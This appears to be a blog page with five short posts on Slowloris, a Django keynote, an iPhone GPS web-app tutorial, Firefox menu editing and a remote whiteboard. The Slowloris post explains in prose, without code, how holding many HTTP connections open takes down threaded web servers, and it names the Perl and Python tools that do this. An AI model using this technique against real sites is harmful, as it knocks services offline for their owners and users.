Slowloris HTTP denial of service

[RSnake] has developed a denial of service technique that can take down servers more effectively. Traditionally, performing a denial of service attack entailed sending thousands of requests to a server, these requests needlessly tie up resources until the server fails. This repetitive attack requires the requests to happen in quick succession, and is usually a distributed effort. However, [RSnake]‘s new technique has a client open several HTTP sessions and keeps them open for as long as possible. Most servers are configured to handle only a set number of connections; the infinite sessions prevent legitimate requests from being handled, shutting down the site. This vulnerability is present on webservers that use threading, such as Apache.

A positive side effect of the hack is that the server does not crash, only the HTTP server is affected. His example perl implementation, slowloris, is able to take down an average website using only one computer. Once the attack stops, the website will come back online immediately.

Update: Reader [Motoma] sent in a python implementation of slowloris called pyloris

[photo: cutebreak]

Why I Hate Django

[Cal Henderson] delivered a keynote titled Why I Hate Django at the first annual DjangoCon. Django is an open source BSD licensed web framework written in Python. Google has posted the keynote in its entirety to YouTube, which you can find embedded above. While the talk is humorous (and takes many jabs at Rails developers) it does provide insight into what makes a good web framework. [Cal] is Director of Engineering at Flickr and is an authority on how to make websites scale. He points out that most frameworks are designed to get projects off the ground quickly, but are lacking when it comes to building an even larger service. He talks about several things in Django that need work and improvements that could be made. It’s really an interesting look at what it takes to go big. [Read more...]

Creating web applications for the iPhone

[Dominiek ter Heid] wanted to prototype an application for the iPhone that incorporated GPS. He experimented, and came up with a step-by-step tutorial on how to create a web application that would push GPS information to his iPhone through the use of JavaScript and AJAX. This tutorial will save web hackers who want to play with the iPhone 3G a lot of grief. Using Cocoa Touch, and a CSS/JavaScript pack called IUI, he successfully created a web application that looks native to the iPhone and is able to grab GPS information. The application integrates the GoogleMaps API with the GeoNames database. We look forward to seeing the types of creative applications that this prototype will inspire. What sort of web application would you want to create for the iPhone?

[via digg]

Hacking Firefox menus


[Nick] sent in his quick hack for getting rid of extra menu options in Firefox 3, like the ever useless ‘Work Offline’ option. (OK, maybe modem lovers like it…) If you’re tired of seeing cluttered menu choices that you never use, [Nick]‘s simple trick of editing the XML formatted XUL files in Firefox to clean things up. There’s some risk involved, but it’s nothing that a quick re-install can’t repair. The writeup includes a basic introduction to the XML tags, so you can probably do it. You can use a text editor right? (Just don’t forget to have the installer or a backup copy handy before you start playing around.)

Remote control whiteboard


Whenever [sprite_tm] sends in his latest project, it’s like getting a Christmas present and a night off. He put together a whiteboard, x/y stepper system, serial interfaced microcontroller and added a webcam with perspective correction for the online view. Me? I’m tempted to build one of these for leaving notes for the wife when I’m out.

Follow

Get every new post delivered to your Inbox.

Join 93,886 other followers